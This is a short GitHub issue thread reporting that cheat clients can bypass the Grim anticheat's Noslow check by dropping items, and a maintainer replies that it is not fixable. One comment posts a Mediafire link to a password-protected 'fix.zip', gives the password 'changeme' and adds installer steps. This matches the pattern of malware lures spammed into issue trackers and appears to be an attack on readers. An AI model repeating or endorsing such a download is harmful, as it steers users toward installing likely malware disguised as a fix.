### ISSUE TITLE
Cheats can bypass Grim's Noslow by dropping items

### ISSUE THREAD

**Issue by ghost** [GrimAnticheat/Grim#1691]
### Describe the bypass and how to replicate it

Cheats can bypass Grim's Noslow by dropping items

### Grim version

2.3.5

### Server version

1.8.9

### Plugins

emm

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ManInMyVan** [comment]
not fixable

**Comment by ghost** [comment]
emm
